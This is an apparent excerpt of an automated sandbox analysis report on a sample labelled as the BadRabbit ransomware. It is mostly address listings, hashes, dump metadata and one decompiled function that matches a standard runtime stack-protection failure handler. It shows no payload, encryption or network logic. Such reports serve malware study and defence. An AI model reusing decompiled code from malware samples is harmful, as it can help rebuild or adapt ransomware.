                                                                                                                                                                                        0x01321e30
                                                                                                                                                                                        0x01321e32
                                                                                                                                                                                        0x01321e35
                                                                                                                                                                                        0x01321e38
                                                                                                                                                                                        0x01321e3a
                                                                                                                                                                                        0x01321e3c
                                                                                                                                                                                        0x01321e42
                                                                                                                                                                                        0x01321e45
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321e45
                                                                                                                                                                                        0x01321de1
                                                                                                                                                                                        0x01321de4
                                                                                                                                                                                        0x01321de4
                                                                                                                                                                                        0x01321de6
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321dec
                                                                                                                                                                                        0x01321df0
                                                                                                                                                                                        0x01321df3
                                                                                                                                                                                        0x01321df5
                                                                                                                                                                                        0x01321df7
                                                                                                                                                                                        0x01321dfa
                                                                                                                                                                                        0x01321dfd
                                                                                                                                                                                        0x01321dff
                                                                                                                                                                                        0x01321e02
                                                                                                                                                                                        0x01321e03
                                                                                                                                                                                        0x01321e06
                                                                                                                                                                                        0x01321e09
                                                                                                                                                                                        0x01321e0c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321e0c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321e49
                                                                                                                                                                                        0x01321e49
                                                                                                                                                                                        0x01321e4b
                                                                                                                                                                                        0x01321e4b
                                                                                                                                                                                        0x01321e4e
                                                                                                                                                                                        0x01322a18
                                                                                                                                                                                        0x01322a1b
                                                                                                                                                                                        0x01322a1e
                                                                                                                                                                                        0x01322a21
                                                                                                                                                                                        0x01322a24
                                                                                                                                                                                        0x01322a27
                                                                                                                                                                                        0x01322a29
                                                                                                                                                                                        0x01322a2c
                                                                                                                                                                                        0x01322a2f
                                                                                                                                                                                        0x01322a32
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322a32
                                                                                                                                                                                        0x01321e57
                                                                                                                                                                                        0x01321e5c
                                                                                                                                                                                        0x01321e5f
                                                                                                                                                                                        0x01321e62
                                                                                                                                                                                        0x01321e65
                                                                                                                                                                                        0x01321e68
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321e6e
                                                                                                                                                                                        0x01321e6e
                                                                                                                                                                                        0x01321e72
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321e78
                                                                                                                                                                                        0x01321e7c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321e82
                                                                                                                                                                                        0x01321e82
                                                                                                                                                                                        0x01321e86
                                                                                                                                                                                        0x01321ea2
                                                                                                                                                                                        0x01321ea5
                                                                                                                                                                                        0x01321ed4
                                                                                                                                                                                        0x01321ed4
                                                                                                                                                                                        0x01321ed6
                                                                                                                                                                                        0x01321edb
                                                                                                                                                                                        0x01321ee0
                                                                                                                                                                                        0x01321ee3
                                                                                                                                                                                        0x01321ee3
                                                                                                                                                                                        0x01321ee6
                                                                                                                                                                                        0x01321f2a
                                                                                                                                                                                        0x01321f30
                                                                                                                                                                                        0x01321f30
                                                                                                                                                                                        0x01321f33
                                                                                                                                                                                        0x013218eb
                                                                                                                                                                                        0x013218eb
                                                                                                                                                                                        0x013218ee
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013218ee
                                                                                                                                                                                        0x01321ee8
                                                                                                                                                                                        0x01321ee8
                                                                                                                                                                                        0x01321ee9
                                                                                                                                                                                        0x01321f08
                                                                                                                                                                                        0x01321f10
                                                                                                                                                                                        0x01321f16
                                                                                                                                                                                        0x01321f1a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321f1c
                                                                                                                                                                                        0x01321f1f
                                                                                                                                                                                        0x01321f22
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321f22
                                                                                                                                                                                        0x01321eeb
                                                                                                                                                                                        0x01321eeb
                                                                                                                                                                                        0x01321eec
                                                                                                                                                                                        0x01321f00
                                                                                                                                                                                        0x01321f02
                                                                                                                                                                                        0x01321f03
                                                                                                                                                                                        0x01321eee
                                                                                                                                                                                        0x01321eee
                                                                                                                                                                                        0x01321eee
                                                                                                                                                                                        0x01321eef
                                                                                                                                                                                        0x01321ef1
                                                                                                                                                                                        0x01321ef8
                                                                                                                                                                                        0x01321ef8
                                                                                                                                                                                        0x01321eef
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321eec
                                                                                                                                                                                        0x01321ea7
                                                                                                                                                                                        0x01321eaa
                                                                                                                                                                                        0x01321eaa
                                                                                                                                                                                        0x01322107
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013220a8
                                                                                                                                                                                        0x013220ab
                                                                                                                                                                                        0x013220da
                                                                                                                                                                                        0x013220da
                                                                                                                                                                                        0x013220df
                                                                                                                                                                                        0x013220e2
                                                                                                                                                                                        0x013220e5
                                                                                                                                                                                        0x013220e8
                                                                                                                                                                                        0x013220f0
                                                                                                                                                                                        0x013220f5
                                                                                                                                                                                        0x013220f8
                                                                                                                                                                                        0x013220f8
                                                                                                                                                                                        0x013220fb
                                                                                                                                                                                        0x013220fe
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013220fe
                                                                                                                                                                                        0x013220ad
                                                                                                                                                                                        0x013220b0
                                                                                                                                                                                        0x013220b0
                                                                                                                                                                                        0x013220b2
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013220b8
                                                                                                                                                                                        0x013220bc
                                                                                                                                                                                        0x013220bf
                                                                                                                                                                                        0x013220c1
                                                                                                                                                                                        0x013220c3
                                                                                                                                                                                        0x013220c6
                                                                                                                                                                                        0x013220c9
                                                                                                                                                                                        0x013220cb
                                                                                                                                                                                        0x013220ce
                                                                                                                                                                                        0x013220cf
                                                                                                                                                                                        0x013220d2
                                                                                                                                                                                        0x013220d5
                                                                                                                                                                                        0x013220d8
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013220d8
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013220b0
                                                                                                                                                                                        0x01322120
                                                                                                                                                                                        0x01322120
                                                                                                                                                                                        0x01322124
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132210b
                                                                                                                                                                                        0x0132210e
                                                                                                                                                                                        0x01322110
                                                                                                                                                                                        0x01322118
                                                                                                                                                                                        0x0132211d
                                                                                                                                                                                        0x0132211d
                                                                                                                                                                                        0x0132211d
                                                                                                                                                                                        0x0132211d
                                                                                                                                                                                        0x01322126
                                                                                                                                                                                        0x0132212c
                                                                                                                                                                                        0x0132212f
                                                                                                                                                                                        0x01322132
                                                                                                                                                                                        0x01322134
                                                                                                                                                                                        0x01322137
                                                                                                                                                                                        0x0132213d
                                                                                                                                                                                        0x01322148
                                                                                                                                                                                        0x0132214e
                                                                                                                                                                                        0x01322156
                                                                                                                                                                                        0x01322159
                                                                                                                                                                                        0x0132215b
                                                                                                                                                                                        0x0132216f
                                                                                                                                                                                        0x01322173
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322173
                                                                                                                                                                                        0x0132215d
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132232f
                                                                                                                                                                                        0x0132232f
                                                                                                                                                                                        0x01322332
                                                                                                                                                                                        0x01322335
                                                                                                                                                                                        0x01322338
                                                                                                                                                                                        0x0132233b
                                                                                                                                                                                        0x0132233d
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013221a1
                                                                                                                                                                                        0x013221a1
                                                                                                                                                                                        0x013221a1
                                                                                                                                                                                        0x013221a4
                                                                                                                                                                                        0x013221a6
                                                                                                                                                                                        0x013221aa
                                                                                                                                                                                        0x013221ac
                                                                                                                                                                                        0x013221ad
                                                                                                                                                                                        0x013221b0
                                                                                                                                                                                        0x013221b5
                                                                                                                                                                                        0x013221b8
                                                                                                                                                                                        0x013221bb
                                                                                                                                                                                        0x013221be
                                                                                                                                                                                        0x013221c0
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132217e
                                                                                                                                                                                        0x01322181
                                                                                                                                                                                        0x01322183
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322189
                                                                                                                                                                                        0x0132218d
                                                                                                                                                                                        0x01322190
                                                                                                                                                                                        0x01322195
                                                                                                                                                                                        0x01322197
                                                                                                                                                                                        0x0132219b
                                                                                                                                                                                        0x0132219e
                                                                                                                                                                                        0x0132219e
                                                                                                                                                                                        0x0132219e
                                                                                                                                                                                        0x013221c2
                                                                                                                                                                                        0x013221c4
                                                                                                                                                                                        0x013221c6
                                                                                                                                                                                        0x013221c9
                                                                                                                                                                                        0x013221ca
                                                                                                                                                                                        0x013221cd
                                                                                                                                                                                        0x013221ed
                                                                                                                                                                                        0x0132225e
                                                                                                                                                                                        0x01322261
                                                                                                                                                                                        0x01322263
                                                                                                                                                                                        0x01322264
                                                                                                                                                                                        0x01322268
                                                                                                                                                                                        0x0132226b
                                                                                                                                                                                        0x013222b5
                                                                                                                                                                                        0x013222b8
                                                                                                                                                                                        0x013222b8
                                                                                                                                                                                        0x013222b8
                                                                                                                                                                                        0x013222bb
                                                                                                                                                                                        0x013222bd
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013222bf
                                                                                                                                                                                        0x013222c2
                                                                                                                                                                                        0x013222c4
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322201
                                                                                                                                                                                        0x013221cf
                                                                                                                                                                                        0x013221d2
                                                                                                                                                                                        0x013221d5
                                                                                                                                                                                        0x013221d8
                                                                                                                                                                                        0x013221da
                                                                                                                                                                                        0x013221dd
                                                                                                                                                                                        0x013221e0
                                                                                                                                                                                        0x013221e5
                                                                                                                                                                                        0x013221e5
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132241c
                                                                                                                                                                                        0x0132241c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322422
                                                                                                                                                                                        0x01322422
                                                                                                                                                                                        0x01322425
                                                                                                                                                                                        0x0132248e
                                                                                                                                                                                        0x0132248e
                                                                                                                                                                                        0x01322491
                                                                                                                                                                                        0x01322494
                                                                                                                                                                                        0x0132249b
                                                                                                                                                                                        0x013224a0
                                                                                                                                                                                        0x013224a1
                                                                                                                                                                                        0x013224a3
                                                                                                                                                                                        0x013224a6
                                                                                                                                                                                        0x013224a7
                                                                                                                                                                                        0x013224a9
                                                                                                                                                                                        0x013224ea
                                                                                                                                                                                        0x013224ec
                                                                                                                                                                                        0x013224ef
                                                                                                                                                                                        0x013224f2
                                                                                                                                                                                        0x013224f4
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013224ae
                                                                                                                                                                                        0x013224b1
                                                                                                                                                                                        0x013224b3
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013224b9
                                                                                                                                                                                        0x013224bd
                                                                                                                                                                                        0x013224c0
                                                                                                                                                                                        0x013224c2
                                                                                                                                                                                        0x013224c5
                                                                                                                                                                                        0x013224cb
                                                                                                                                                                                        0x013224cd
                                                                                                                                                                                        0x013224d0
                                                                                                                                                                                        0x013224d2
                                                                                                                                                                                        0x013224d5
                                                                                                                                                                                        0x013224d8
                                                                                                                                                                                        0x013224dd
                                                                                                                                                                                        0x013224e0
                                                                                                                                                                                        0x013224e1
                                                                                                                                                                                        0x013224e1
                                                                                                                                                                                        0x013224e4
                                                                                                                                                                                        0x013224e7
                                                                                                                                                                                        0x013224e7
                                                                                                                                                                                        0x013224f6
                                                                                                                                                                                        0x013224f8
                                                                                                                                                                                        0x013225b2
                                                                                                                                                                                        0x013225b4
                                                                                                                                                                                        0x013225b7
                                                                                                                                                                                        0x013225ba
                                                                                                                                                                                        0x013225c0
                                                                                                                                                                                        0x013225c2
                                                                                                                                                                                        0x013225c4
                                                                                                                                                                                        0x013225c6
                                                                                                                                                                                        0x013225c9
                                                                                                                                                                                        0x013225cc
                                                                                                                                                                                        0x013225cf
                                                                                                                                                                                        0x013225d2
                                                                                                                                                                                        0x013225d4
                                                                                                                                                                                        0x013225e1
                                                                                                                                                                                        0x013225e3
                                                                                                                                                                                        0x013225f7
                                                                                                                                                                                        0x013225fa
                                                                                                                                                                                        0x013225fc
                                                                                                                                                                                        0x0132260a
                                                                                                                                                                                        0x0132260d
                                                                                                                                                                                        0x0132260d
                                                                                                                                                                                        0x01322610
                                                                                                                                                                                        0x01322616
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322616
                                                                                                                                                                                        0x013225fe
                                                                                                                                                                                        0x01321953
                                                                                                                                                                                        0x01321953
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321953
                                                                                                                                                                                        0x013225e5
                                                                                                                                                                                        0x013225ec
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013225ec
                                                                                                                                                                                        0x013225d6
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013225d6
                                                                                                                                                                                        0x013224fe
                                                                                                                                                                                        0x01322500
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322506
                                                                                                                                                                                        0x01322508
                                                                                                                                                                                        0x0132250b
                                                                                                                                                                                        0x0132250d
                                                                                                                                                                                        0x0132250e
                                                                                                                                                                                        0x01322511
                                                                                                                                                                                        0x01322513
                                                                                                                                                                                        0x01322516
                                                                                                                                                                                        0x01322518
                                                                                                                                                                                        0x0132251b
                                                                                                                                                                                        0x0132251d
                                                                                                                                                                                        0x0132251f
                                                                                                                                                                                        0x01322520
                                                                                                                                                                                        0x01322526
                                                                                                                                                                                        0x01322528
                                                                                                                                                                                        0x0132252b
                                                                                                                                                                                        0x0132252d
                                                                                                                                                                                        0x01322530
                                                                                                                                                                                        0x01322532
                                                                                                                                                                                        0x01322535
                                                                                                                                                                                        0x01322538
                                                                                                                                                                                        0x0132253b
                                                                                                                                                                                        0x0132253e
                                                                                                                                                                                        0x01322541
                                                                                                                                                                                        0x01322543
                                                                                                                                                                                        0x01322545
                                                                                                                                                                                        0x0132259f
                                                                                                                                                                                        0x0132259f
                                                                                                                                                                                        0x013225a2
                                                                                                                                                                                        0x013225a5
                                                                                                                                                                                        0x013225a8
                                                                                                                                                                                        0x013225aa
                                                                                                                                                                                        0x013225aa
                                                                                                                                                                                        0x013225ac
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322547
                                                                                                                                                                                        0x01322547
                                                                                                                                                                                        0x0132271b
                                                                                                                                                                                        0x0132271e
                                                                                                                                                                                        0x01322721
                                                                                                                                                                                        0x01322724
                                                                                                                                                                                        0x01322727
                                                                                                                                                                                        0x01322729
                                                                                                                                                                                        0x0132272b
                                                                                                                                                                                        0x01322785
                                                                                                                                                                                        0x01322785
                                                                                                                                                                                        0x01322788
                                                                                                                                                                                        0x0132278b
                                                                                                                                                                                        0x0132278d
                                                                                                                                                                                        0x0132278f
                                                                                                                                                                                        0x0132278f
                                                                                                                                                                                        0x0132278f
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132272d
                                                                                                                                                                                        0x0132272d
                                                                                                                                                                                        0x0132272d
                                                                                                                                                                                        0x01322730
                                                                                                                                                                                        0x01322732
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322738
                                                                                                                                                                                        0x01322739
                                                                                                                                                                                        0x0132273b
                                                                                                                                                                                        0x0132273e
                                                                                                                                                                                        0x01322741
                                                                                                                                                                                        0x01322744
                                                                                                                                                                                        0x01322747
                                                                                                                                                                                        0x0132274d
                                                                                                                                                                                        0x0132274f
                                                                                                                                                                                        0x01322752
                                                                                                                                                                                        0x01322753
                                                                                                                                                                                        0x01322757
                                                                                                                                                                                        0x0132275c
                                                                                                                                                                                        0x01322760
                                                                                                                                                                                        0x01322762
                                                                                                                                                                                        0x01322764
                                                                                                                                                                                        0x01322767
                                                                                                                                                                                        0x0132276a
                                                                                                                                                                                        0x0132276c
                                                                                                                                                                                        0x0132276e
                                                                                                                                                                                        0x01322771
                                                                                                                                                                                        0x01322776
                                                                                                                                                                                        0x01322779
                                                                                                                                                                                        0x0132277c
                                                                                                                                                                                        0x0132277e
                                                                                                                                                                                        0x01322781
                                                                                                                                                                                        0x01322783
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322783
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132272d
                                                                                                                                                                                        0x0132269c
                                                                                                                                                                                        0x0132269f
                                                                                                                                                                                        0x0132269f
                                                                                                                                                                                        0x013226a1
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013226a7
                                                                                                                                                                                        0x013226aa
                                                                                                                                                                                        0x013226ac
                                                                                                                                                                                        0x013226ad
                                                                                                                                                                                        0x013226b0
                                                                                                                                                                                        0x013226b3
                                                                                                                                                                                        0x013226b9
                                                                                                                                                                                        0x013226bb
                                                                                                                                                                                        0x013226be
                                                                                                                                                                                        0x013226c0
                                                                                                                                                                                        0x013226c3
                                                                                                                                                                                        0x013226c6
                                                                                                                                                                                        0x013226cb
                                                                                                                                                                                        0x013226ce
                                                                                                                                                                                        0x013226cf
                                                                                                                                                                                        0x013226d2
                                                                                                                                                                                        0x013226d5
                                                                                                                                                                                        0x013226d7
                                                                                                                                                                                        0x013226dd
                                                                                                                                                                                        0x013226e0
                                                                                                                                                                                        0x013226e2
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013226e2
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013227d7
                                                                                                                                                                                        0x013227d7
                                                                                                                                                                                        0x013227da
                                                                                                                                                                                        0x013227dc
                                                                                                                                                                                        0x0132282c
                                                                                                                                                                                        0x0132282c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132282c
                                                                                                                                                                                        0x013227de
                                                                                                                                                                                        0x013227e0
                                                                                                                                                                                        0x01322811
                                                                                                                                                                                        0x01322811
                                                                                                                                                                                        0x01322813
                                                                                                                                                                                        0x01322815
                                                                                                                                                                                        0x01322816
                                                                                                                                                                                        0x0132281b
                                                                                                                                                                                        0x0132281c
                                                                                                                                                                                        0x0132281e
                                                                                                                                                                                        0x01322820
                                                                                                                                                                                        0x01322823
                                                                                                                                                                                        0x01322823
                                                                                                                                                                                        0x01322823
                                                                                                                                                                                        0x01322829
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322829
                                                                                                                                                                                        0x013227e2
                                                                                                                                                                                        0x013227e5
                                                                                                                                                                                        0x013227e5
                                                                                                                                                                                        0x013227e8
                                                                                                                                                                                        0x013227ea
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013227f0
                                                                                                                                                                                        0x013227f4
                                                                                                                                                                                        0x013227f7
                                                                                                                                                                                        0x013227f9
                                                                                                                                                                                        0x013227fb
                                                                                                                                                                                        0x013227fe
                                                                                                                                                                                        0x01322801
                                                                                                                                                                                        0x01322803
                                                                                                                                                                                        0x01322806
                                                                                                                                                                                        0x01322807
                                                                                                                                                                                        0x0132280a
                                                                                                                                                                                        0x0132280d
                                                                                                                                                                                        0x0132280f
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132280f
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322acb
                                                                                                                                                                                        0x01322ace
                                                                                                                                                                                        0x01322ad0
                                                                                                                                                                                        0x01322ad2
                                                                                                                                                                                        0x01322ad7
                                                                                                                                                                                        0x01322ada
                                                                                                                                                                                        0x01322adb
                                                                                                                                                                                        0x01322ade
                                                                                                                                                                                        0x01322ae1
                                                                                                                                                                                        0x01322aea
                                                                                                                                                                                        0x01322ae3
                                                                                                                                                                                        0x01322ae3
                                                                                                                                                                                        0x01322ae3
                                                                                                                                                                                        0x01322aef
                                                                                                                                                                                        0x01322af2
                                                                                                                                                                                        0x01322af2
                                                                                                                                                                                        0x01322af4
                                                                                                                                                                                        0x01322af4
                                                                                                                                                                                        0x01322ad2
                                                                                                                                                                                        0x01322af7
                                                                                                                                                                                        0x01322afa
                                                                                                                                                                                        0x01322b01
                                                                                                                                                                                        0x01322b01
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322afc
                                                                                                                                                                                        0x01322afc
                                                                                                                                                                                        0x01322aff
                                                                                                                                                                                        0x01322b06
                                                                                                                                                                                        0x01322b0b
                                                                                                                                                                                        0x01322b12
                                                                                                                                                                                        0x01322b19
                                                                                                                                                                                        0x01322b1c
                                                                                                                                                                                        0x01322b22
                                                                                                                                                                                        0x01322b24
                                                                                                                                                                                        0x01322b27
                                                                                                                                                                                        0x01322b2d
                                                                                                                                                                                        0x01322b2f
                                                                                                                                                                                        0x01322b35
                                                                                                                                                                                        0x01322b35
                                                                                                                                                                                        0x01322b39
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322b4b
                                                                                                                                                                                        0x01322b3b
                                                                                                                                                                                        0x01322b3b
                                                                                                                                                                                        0x01322b3e
                                                                                                                                                                                        0x01322b40
                                                                                                                                                                                        0x01322b42
                                                                                                                                                                                        0x01322b43
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322b43
                                                                                                                                                                                        0x01322b31
                                                                                                                                                                                        0x01322b33
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322b33
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322aff
                                                                                                                                                                                        0x01322afa
                                                                                                                                                                                        0x01322aa7
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322aa7
                                                                                                                                                                                        0x01322a7c
                                                                                                                                                                                        0x01322a7f
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322a81
                                                                                                                                                                                        0x01322a84
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322a86
                                                                                                                                                                                        0x01322a89
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322a8b
                                                                                                                                                                                        0x01322a8f
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322aad
                                                                                                                                                                                        0x01322aad
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321dc5
                                                                                                                                                                                        0x01321dc5
                                                                                                                                                                                        0x01321dc7
                                                                                                                                                                                        0x013217be
                                                                                                                                                                                        0x013217b5

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
                                                                                                                                                                                        • Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 8 Oet$8 Oet$8 Oet$header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown header flags set
                                                                                                                                                                                        • API String ID: 0-3597181670
                                                                                                                                                                                        • Opcode ID: 7602052e18b03186a9dd7082b1155b2fc4dc157f917fa8e87a984acf5c0d4ddb
                                                                                                                                                                                        • Instruction ID: fb90a4cbe9fe4d4d18e64fe9f19fc8a5754ed4081a90dc588224b5d25bb80be9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7602052e18b03186a9dd7082b1155b2fc4dc157f917fa8e87a984acf5c0d4ddb
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E426C70A00229DFEF18EF5DC9806AEBBF2BF88304F1485A9D855DB646D774DA41CB90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 624 1321499-132149f 625 13214a1 624->625 626 13214a4-132158a UnhandledExcep GetCurrentProcess TerminateProcess 624->626
                                                                                                                                                                                        C-Code - Quality: 59%
                                                                                                                                                                                        			E01321499(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                                        				void* _v804;
                                                                                                                                                                                        				intOrPtr _v808;
                                                                                                                                                                                        				intOrPtr _v812;
                                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                                        
                                                                                                                                                                                        				if(__ecx !=  *0x1328000) {
                                                                                                                                                                                        					 *0x1328120 = __eax;
                                                                                                                                                                                        					 *0x132811c = __ecx;
                                                                                                                                                                                        					 *0x1328118 = __edx;
                                                                                                                                                                                        					 *0x1328114 = __ebx;
                                                                                                                                                                                        					 *0x1328110 = __esi;
                                                                                                                                                                                        					 *0x132810c = __edi;
                                                                                                                                                                                        					 *0x1328138 = ss;
                                                                                                                                                                                        					 *0x132812c = cs;
                                                                                                                                                                                        					 *0x1328108 = ds;
                                                                                                                                                                                        					 *0x1328104 = es;
                                                                                                                                                                                        					 *0x1328100 = fs;
                                                                                                                                                                                        					 *0x13280fc = gs;
                                                                                                                                                                                        					asm("pushfd");
                                                                                                                                                                                        					_pop( *0x1328130);
                                                                                                                                                                                        					 *0x1328124 =  *_t25;
                                                                                                                                                                                        					 *0x1328128 = _v0;
                                                                                                                                                                                        					 *0x1328134 =  &_a4;
                                                                                                                                                                                        					 *0x1328070 = 0x10001;
                                                                                                                                                                                        					 *0x132802c =  *0x1328128;
                                                                                                                                                                                        					 *0x1328020 = 0xc0000409;
                                                                                                                                                                                        					 *0x1328024 = 1;
                                                                                                                                                                                        					_v812 =  *0x1328000;
                                                                                                                                                                                        					_v808 =  *0x1328004;
                                                                                                                                                                                        					SetUnhandledExceptionFilter(0);
                                                                                                                                                                                        					__imp__UnhandledExcep(0x1324080);
                                                                                                                                                                                        					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					return __eax;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01321566
                                                                                                                                                                                        • UnhandledExcep.KERNEL32(01324080), ref: 01321571
                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0132157C
                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 01321583
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
                                                                                                                                                                                        • Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ProcessUnhandled$CurrentExcepExceptionFilterTerminate
                                                                                                                                                                                        • String ID: Pdet
                                                                                                                                                                                        • API String ID: 1999905405-3933575557
                                                                                                                                                                                        • Opcode ID: 587c7ea7eebedd66573f278a83ca2f7ce8e465ceec79e8753a53249529b1dfb4
                                                                                                                                                                                        • Instruction ID: 9c7a9c01b0ea5e8c6240549d4835e9539a2212cb21013ee59802ef6b476615c0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 587c7ea7eebedd66573f278a83ca2f7ce8e465ceec79e8753a53249529b1dfb4
